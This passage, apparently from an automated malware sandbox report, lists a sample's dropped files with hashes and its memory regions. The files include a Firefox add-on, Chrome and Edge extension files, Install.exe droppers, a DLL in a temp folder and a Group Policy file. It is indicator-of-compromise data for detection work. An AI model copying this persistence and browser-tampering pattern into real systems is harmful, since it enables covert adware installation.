                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3712 -ip 3712
                                                                                                            1⤵
                                                                                                              PID:3944
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4640 -ip 4640
                                                                                                              1⤵
                                                                                                                PID:1620

                                                                                                              Network

                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                              Replay Monitor

                                                                                                              Loading Replay Monitor...

                                                                                                              Downloads

                                                                                                              • C:\$RECYCLE.BIN\S-1-5-18\desktop.ini

                                                                                                                Filesize

                                                                                                                129B

                                                                                                                MD5

                                                                                                                a526b9e7c716b3489d8cc062fbce4005

                                                                                                                SHA1

                                                                                                                2df502a944ff721241be20a9e449d2acd07e0312

                                                                                                                SHA256

                                                                                                                e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066

                                                                                                                SHA512

                                                                                                                d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88

                                                                                                              • C:\Program Files (x86)\TRPrKrqOfjymC\BLXEgYL.xml

                                                                                                                Filesize

                                                                                                                2KB

                                                                                                                MD5

                                                                                                                b822510ff829c03d8da793df649551a6

                                                                                                                SHA1

                                                                                                                a13ec9d5dca1bd42e3fe843b12944bcc5bc88aff

                                                                                                                SHA256

                                                                                                                007724d9d0b3d8569872855fe67fc2a5247cb0912f2733e02de2f6e9fd472d06

                                                                                                                SHA512

                                                                                                                2ecc4927433381a39e85bac511f9de4bee595662e177d1291291aa6286ad655666e4484946dc3db64e7901274f7f2895d9329d156cf11ec7f8c06805f5011ef1

                                                                                                              • C:\Program Files (x86)\dRqtboZzFpLGkHANyeR\lYnSiyW.xml

                                                                                                                Filesize

                                                                                                                2KB

                                                                                                                MD5

                                                                                                                28772f298727d986bf4499cb0283b810

                                                                                                                SHA1

                                                                                                                4b859907850a47e728e0674ed9826fb28ce8ddd0

                                                                                                                SHA256

                                                                                                                90680b21f4ea297c2ed07de2360c3a6f9562480d1cc06b2249d0eaa8fba4fbbf

                                                                                                                SHA512

                                                                                                                b1752c265d10d97280293f77807c9244c12d2067adb6681d3e24dbad5f84aacd9a517c579b118cc82bca37dc0c4d1fad23c3ca98e5cff4443aed0ecb19e2abb7

                                                                                                              • C:\Program Files (x86)\hUNZbiKEU\JbnfRHC.xml

                                                                                                                Filesize

                                                                                                                2KB

                                                                                                                MD5

                                                                                                                dc2a3b8dabf151370250a1452260894f

                                                                                                                SHA1

                                                                                                                a3f30f1ed0e3e99ca9c1324e72e75738e7149481

                                                                                                                SHA256

                                                                                                                b182eb49349b32eb9069e465664ee9e2d6b7185aee9e56bb68d70b81377ffa18

                                                                                                                SHA512

                                                                                                                af95a7c5a3004cd9194c71b9a45215f74acf8b05843d670a6c21e7fb865aa743a725afed6f1a3a14e41f5f93e9162e117a1ed7da844d73682533bb52ace9e83d

                                                                                                              • C:\Program Files (x86)\vzHhDQJThpHU2\JpdwdTy.xml

                                                                                                                Filesize

                                                                                                                2KB

                                                                                                                MD5

                                                                                                                695cf0531253511bcced6461001f6fe9

                                                                                                                SHA1

                                                                                                                fb9c32dc490019ba984f8c1cc6ac21c5ebb3aedb

                                                                                                                SHA256

                                                                                                                eedae7a6525f9f8c41faac5f74c6404fb640c1375811b3ed21155d4d8c461e53

                                                                                                                SHA512

                                                                                                                1f08ce319d99f07908bc77a7bbf5a20485167b2db2cbfeee4fbe159dd7065373797ba01791c929f72910db72d05c77cdd77ae4c1df4d28d92e685855a2aac6dd

                                                                                                              • C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

                                                                                                                Filesize

                                                                                                                2.1MB

                                                                                                                MD5

                                                                                                                e73c15277b96f0e2fd6eb61b1fe5b3c1

                                                                                                                SHA1

                                                                                                                63092b99a160ab64e1f9fe905d91ece094a3d675

                                                                                                                SHA256

                                                                                                                57f3362f6eee02b056fadb72149f36bad0716e7a5fd3502cb0d61770644a0d86

                                                                                                                SHA512

                                                                                                                93ed65735735843daf9ed50a0eae87117c8c0fbe30819077170bb073225a6abaf1fd07a3d6094222cbc2c7a8c607ca815aa98fd8ab78c8af78f1123a38044544

                                                                                                              • C:\ProgramData\BtspJvyVMEkRHCVB\jEGYypI.xml

                                                                                                                Filesize

                                                                                                                2KB

                                                                                                                MD5

                                                                                                                0de9f8404ef0cb5fad96899b8ca10618

                                                                                                                SHA1

                                                                                                                24e47e4dce80c7c86534959f32d5486a895d0872

                                                                                                                SHA256

                                                                                                                246e433bcde15959dd7397c0f9689ead88fd668d43d2dca5cf87516602712235

                                                                                                                SHA512

                                                                                                                25edafd9dc374284a479cb6e582a8bc28bcd4b90a2de83d4a4b118c6e2f8c869e4139b2e429e337e5167088766d6896f19cc57f78b284b571b04d62aa5098c84

                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

                                                                                                                Filesize

                                                                                                                187B

                                                                                                                MD5

                                                                                                                2a1e12a4811892d95962998e184399d8

                                                                                                                SHA1

                                                                                                                55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                SHA256

                                                                                                                32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                SHA512

                                                                                                                bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

                                                                                                                Filesize

                                                                                                                136B

                                                                                                                MD5

                                                                                                                238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                SHA1

                                                                                                                0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                SHA256

                                                                                                                801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                SHA512

                                                                                                                2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

                                                                                                                Filesize

                                                                                                                150B

                                                                                                                MD5

                                                                                                                0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                SHA1

                                                                                                                6a51537cef82143d3d768759b21598542d683904

                                                                                                                SHA256

                                                                                                                0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                SHA512

                                                                                                                5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                                                                Filesize

                                                                                                                36KB

                                                                                                                MD5

                                                                                                                a68fbb0354ab5a741480e8c8e397cd5a

                                                                                                                SHA1

                                                                                                                e5a2fa814d61fee3b1b1efe42cd224f6fb1bbd85

                                                                                                                SHA256

                                                                                                                49239af0b0d017cbfc115b4e5590ccd194063f477773e8479d87c19b57e28441

                                                                                                                SHA512

                                                                                                                9e39301e7d0fe50331ff4dc41567cd1ece4bd2b6cb33fcf64bc83bc10b9188ec9d3ecaef144e69b712240580f54134d14d66acc8fb046e129318f292e8aa0103

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                Filesize

                                                                                                                1KB

                                                                                                                MD5

                                                                                                                def65711d78669d7f8e69313be4acf2e

                                                                                                                SHA1

                                                                                                                6522ebf1de09eeb981e270bd95114bc69a49cda6

                                                                                                                SHA256

                                                                                                                aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c

                                                                                                                SHA512

                                                                                                                05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\es\messages.json

                                                                                                                Filesize

                                                                                                                151B

                                                                                                                MD5

                                                                                                                bd6b60b18aee6aaeb83b35c68fb48d88

                                                                                                                SHA1

                                                                                                                9b977a5fbf606d1104894e025e51ac28b56137c3

                                                                                                                SHA256

                                                                                                                b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55

                                                                                                                SHA512

                                                                                                                3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                Filesize

                                                                                                                11KB

                                                                                                                MD5

                                                                                                                531f1126b19be2d4dd256c4bd38a09c4

                                                                                                                SHA1

                                                                                                                4bca1814f1a67c69ae0faa5fc384f0456ece6acf

                                                                                                                SHA256

                                                                                                                cd14b3bcea1222ae5ef598e9e147e95e9b20dc984428fef5c8037da4ce1f43d6

                                                                                                                SHA512

                                                                                                                5c3d062bccefd402a65e1bead9f7431a53693ed85532f8d3e0ad461b7a93d9941d1249499b887604fa553da209e583661f0643ff7feac3b4afd13122b71b63e9

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                Filesize

                                                                                                                15KB

                                                                                                                MD5

                                                                                                                fdf6adb9bd4579920c1debbb78e7b528

                                                                                                                SHA1

                                                                                                                7e4e56fcfb09c8ea33796adfd30f0caf4da626a0

                                                                                                                SHA256

                                                                                                                6136bc4bbedec5b41f1b9bfdb5897fe4a95012f8c0188a7e19f7ff93db905d04

                                                                                                                SHA512

                                                                                                                7957a17fea9a3dd74550b071fe37cdfd7372ad2894e3ae0af3bd80ca4b43fd1e7f29ab38b3db4d4418ac975dab417fdf6ed46613f3487c06aa58bb1c4e9d12e7

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS1085.tmp\Install.exe

                                                                                                                Filesize

                                                                                                                6.6MB

                                                                                                                MD5

                                                                                                                6ea11ea9f26019f9b880455aebff07e0

                                                                                                                SHA1

                                                                                                                c1bd439295097ab9be663c0dc57bcf8dd4f87f9c

                                                                                                                SHA256

                                                                                                                1b0b3907ed98a193dda1a41fd583c36431030fda00244ae5ff0a4b316bb7f003

                                                                                                                SHA512

                                                                                                                fd2577423ddb92831109accbc09bdfe3d9be3645781263d4fd79fed775777be021fc925a88cd65a9ac6b06822d37a2c7e733c9acde16eeb2abafe4223ea63377

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zSE53.tmp\Install.exe

                                                                                                                Filesize

                                                                                                                6.4MB

                                                                                                                MD5

                                                                                                                92281b6a92e79021700c2c753ccdd6c9

                                                                                                                SHA1

                                                                                                                01f0b836841605c5b60bacb4385a401d75fb2219

                                                                                                                SHA256

                                                                                                                860baeb3624fd718c8e51a44b7785614485037574a7ce3f061ec2c1537f876c2

                                                                                                                SHA512

                                                                                                                b1fe892e82f1be32e25930c66b95ff25db0ebf68e95fd6facb0b1c8527284ac353d4d86ff7823df2a93d14b6d2f0fb2d2967ef7dd0127933f3f1318d01d1735a

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bqunsy5i.5xg.ps1

                                                                                                                Filesize

                                                                                                                60B

                                                                                                                MD5

                                                                                                                d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                SHA1

                                                                                                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                SHA256

                                                                                                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                SHA512

                                                                                                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yeb58ys6.default-release\prefs.js

                                                                                                                Filesize

                                                                                                                12KB

                                                                                                                MD5

                                                                                                                a6f20799313bf6bf006f15fa96647ee2

                                                                                                                SHA1

                                                                                                                d8984b2bc6745ef7f3fcba9d7cf1c4a303a8734c

                                                                                                                SHA256

                                                                                                                c210faf49a269c7b12103787f145b6131772008cd110ae49b13532e2bb65dd74

                                                                                                                SHA512

                                                                                                                0976a990926fcd8709051cff973839d47341b200279c08655e332bc324fb23796d762ddaf7d5667c9ef9224a17057cd36d29c0c67eeb1e723f332a71e8ed7c6b

                                                                                                              • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                Filesize

                                                                                                                11KB

                                                                                                                MD5

                                                                                                                acaf25e136427aabc00cedeb1449a1e1

                                                                                                                SHA1

                                                                                                                9b1d9c8faff2b6773ce3a25efb4f7c2b36aefb0b

                                                                                                                SHA256

                                                                                                                28bedf40974d07699c11f66d63661d256118272aca1cedd145c7d936cd322f33

                                                                                                                SHA512

                                                                                                                45622ef49a5b141dc1e40178c4d3fba595913cf646334d7e29a174fe485899ce1998eb1739b636b149d35bdc7a48c4396e9940ecf369dbb448a4a89a5daad70a

                                                                                                              • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                Filesize

                                                                                                                15KB

                                                                                                                MD5

                                                                                                                a2ac074a195154d37f476c93988639ec

                                                                                                                SHA1

                                                                                                                bb4b75db5ca048fd283586439e9c8d3d4e4d89e5

                                                                                                                SHA256

                                                                                                                188e33662d9a970062290b5762a716a6021daac662bd4b8936710d71490eea4f

                                                                                                                SHA512

                                                                                                                b082ac989151e1855c8bb476b9e9bbc9fa1fd3a596a103cecf84c191cfba9195de328abfea0faa7db26fd57c9c23f3f80de3eb9e364035d0d10ddb65b8ae2618

                                                                                                              • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                Filesize

                                                                                                                15KB

                                                                                                                MD5

                                                                                                                761a2173adb0c2ae4af2bc8961f3941e

                                                                                                                SHA1

                                                                                                                7796f8f6d9b7449d6b809f186432957a014b450b

                                                                                                                SHA256

                                                                                                                b201692cf32a9d94dbbea2eb9cb476908e6e5d73b35c444497b0971b08e03341

                                                                                                                SHA512

                                                                                                                dedbda25994c28a1e10a43ffffd9f187103aee822d12176c62168b6fd4f5563347f3c61d388848b49b9b8327ab1340f53fe2107fce49ef221d0ce1b922b090e1

                                                                                                              • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                Filesize

                                                                                                                11KB

                                                                                                                MD5

                                                                                                                f2dbb3816eed72111b49f2ceb3c78cd9

                                                                                                                SHA1

                                                                                                                9b45ced4c819ca0d2c94a65a773a689d98158cd0

                                                                                                                SHA256

                                                                                                                2e1997efe2e9bd683dd587ffa23011f65e2333e53523e8fec3d4a7b19de30594

                                                                                                                SHA512

                                                                                                                493766f1365fbe00a30b3319eef438f3cd9b4394c95878ed82f12905d30a672971a6e35b7f37a3bc31674d0d8ad612eb4fd56d8feebfc367baa5a719e1bdf562

                                                                                                              • C:\Windows\Temp\QTTqELwJAxMxASXQ\kynVmfkx\QmznfYa.dll

                                                                                                                Filesize

                                                                                                                6.5MB

                                                                                                                MD5

                                                                                                                f7a1158bf135ee4b99be744120578309

                                                                                                                SHA1

                                                                                                                6980efc212cbfcc55f9bd376e1ec6af9b9f85d01

                                                                                                                SHA256

                                                                                                                8a760aa2b10659e23c63e8815b5e5be7edbbce95b47eb40e8fb5d218fe3c25dc

                                                                                                                SHA512

                                                                                                                50cc93e00408b4a05fe61d79156088473e1efd3af064d265d99deed2eace407bf9676844c454129cdfeb8941cf9d366bdd02b185a4443ffdbc19cac3e5254f23

                                                                                                              • C:\Windows\system32\GroupPolicy\Machine\Registry.pol

                                                                                                                Filesize

                                                                                                                6KB

                                                                                                                MD5

                                                                                                                2187cf6c47416503a7176b86065c6d3b

                                                                                                                SHA1

                                                                                                                88f3a2dc912aa484dc363c5fb71ad170f5ae25ad

                                                                                                                SHA256

                                                                                                                d74a3b5a6adc440a2b79bf2f56e5132c6d8cdbb28c4954c62082b4505555f308

                                                                                                                SHA512

                                                                                                                d9f1db11c292416d30e68753cfa22de790c08e72ba062592c96f9e7bc65f44861b0c1fcaa5b47e53392d0ec12fd464b12453951f466c99222695f0dcdab9c92b

                                                                                                              • memory/388-33-0x00000000075F0000-0x0000000007B94000-memory.dmp

                                                                                                                Filesize

                                                                                                                5.6MB

                                                                                                              • memory/388-29-0x0000000005E00000-0x0000000005E4C000-memory.dmp

                                                                                                                Filesize

                                                                                                                304KB

                                                                                                              • memory/388-31-0x00000000062B0000-0x00000000062CA000-memory.dmp

                                                                                                                Filesize

                                                                                                                104KB

                                                                                                              • memory/388-13-0x0000000004810000-0x0000000004846000-memory.dmp

                                                                                                                Filesize

                                                                                                                216KB

                                                                                                              • memory/388-14-0x0000000004EF0000-0x0000000005518000-memory.dmp

                                                                                                                Filesize

                                                                                                                6.2MB

                                                                                                              • memory/388-32-0x0000000006330000-0x0000000006352000-memory.dmp

                                                                                                                Filesize

                                                                                                                136KB

                                                                                                              • memory/388-15-0x0000000005550000-0x0000000005572000-memory.dmp

                                                                                                                Filesize

                                                                                                                136KB

                                                                                                              • memory/388-16-0x00000000056F0000-0x0000000005756000-memory.dmp

                                                                                                                Filesize

                                                                                                                408KB

                                                                                                              • memory/388-17-0x0000000005760000-0x00000000057C6000-memory.dmp

                                                                                                                Filesize

                                                                                                                408KB

                                                                                                              • memory/388-30-0x0000000006FA0000-0x0000000007036000-memory.dmp

                                                                                                                Filesize

                                                                                                                600KB

                                                                                                              • memory/388-27-0x0000000005940000-0x0000000005C94000-memory.dmp

                                                                                                                Filesize

                                                                                                                3.3MB

                                                                                                              • memory/388-28-0x0000000005DC0000-0x0000000005DDE000-memory.dmp

                                                                                                                Filesize

                                                                                                                120KB

                                                                                                              • memory/1304-113-0x0000000000250000-0x00000000008F9000-memory.dmp

                                                                                                                Filesize

                                                                                                                6.7MB

                                                                                                              • memory/1304-70-0x0000000010000000-0x00000000105E9000-memory.dmp

                                                                                                                Filesize

                                                                                                                5.9MB

                                                                                                              • memory/1564-75-0x0000000004780000-0x0000000004AD4000-memory.dmp

                                                                                                                Filesize

                                                                                                                3.3MB

                                                                                                              • memory/1672-52-0x0000000005D90000-0x0000000005DDC000-memory.dmp

                                                                                                                Filesize

                                                                                                                304KB

                                                                                                              • memory/1672-50-0x0000000005840000-0x0000000005B94000-memory.dmp

                                                                                                                Filesize

                                                                                                                3.3MB

                                                                                                              • memory/1724-133-0x00000000058C0000-0x000000000590C000-memory.dmp

                                                                                                                Filesize

                                                                                                                304KB

                                                                                                              • memory/1724-131-0x0000000004C20000-0x0000000004F74000-memory.dmp

                                                                                                                Filesize

                                                                                                                3.3MB

                                                                                                              • memory/2188-100-0x0000029370AF0000-0x0000029370B12000-memory.dmp

                                                                                                                Filesize

                                                                                                                136KB

                                                                                                              • memory/2660-62-0x0000000004F10000-0x0000000005264000-memory.dmp

                                                                                                                Filesize

                                                                                                                3.3MB

                                                                                                              • memory/2660-67-0x00000000055B0000-0x00000000055FC000-memory.dmp

                                                                                                                Filesize

                                                                                                                304KB

                                                                                                              • memory/2664-575-0x0000000001960000-0x0000000001F49000-memory.dmp

                                                                                                                Filesize

                                                                                                                5.9MB

                                                                                                              • memory/3712-36-0x0000000010000000-0x00000000105E9000-memory.dmp

                                                                                                                Filesize

                                                                                                                5.9MB

                                                                                                              • memory/3712-55-0x0000000000250000-0x00000000008F9000-memory.dmp

                                                                                                                Filesize

                                                                                                                6.7MB

                                                                                                              • memory/3712-12-0x0000000000250000-0x00000000008F9000-memory.dmp

                                                                                                                Filesize

                                                                                                                6.7MB

                                                                                                              • memory/3844-170-0x00000000047A0000-0x0000000004AF4000-memory.dmp

                                                                                                                Filesize

                                                                                                                3.3MB

                                                                                                              • memory/3844-180-0x0000000004DB0000-0x0000000004DFC000-memory.dmp

                                                                                                                Filesize

                                                                                                                304KB

                                                                                                              • memory/4640-147-0x0000000002A50000-0x0000000002AD5000-memory.dmp

                                                                                                                Filesize

                                                                                                                532KB

                                                                                                              • memory/4640-530-0x0000000003310000-0x0000000003394000-memory.dmp

                                                                                                                Filesize

                                                                                                                528KB

                                                                                                              • memory/4640-200-0x00000000032A0000-0x0000000003302000-memory.dmp

                                                                                                                Filesize

                                                                                                                392KB

                                                                                                              • memory/4640-544-0x0000000003D40000-0x0000000003E19000-memory.dmp

                                                                                                                Filesize

                                                                                                                868KB

                                                                                                              • memory/4640-567-0x0000000000090000-0x0000000000739000-memory.dmp

                                                                                                                Filesize

                                                                                                                6.7MB

                                                                                                              • memory/4640-121-0x0000000000090000-0x0000000000739000-memory.dmp

                                                                                                                Filesize

                                                                                                                6.7MB

                                                                                                              • memory/4640-135-0x0000000010000000-0x00000000105E9000-memory.dmp

                                                                                                                Filesize

                                                                                                                5.9MB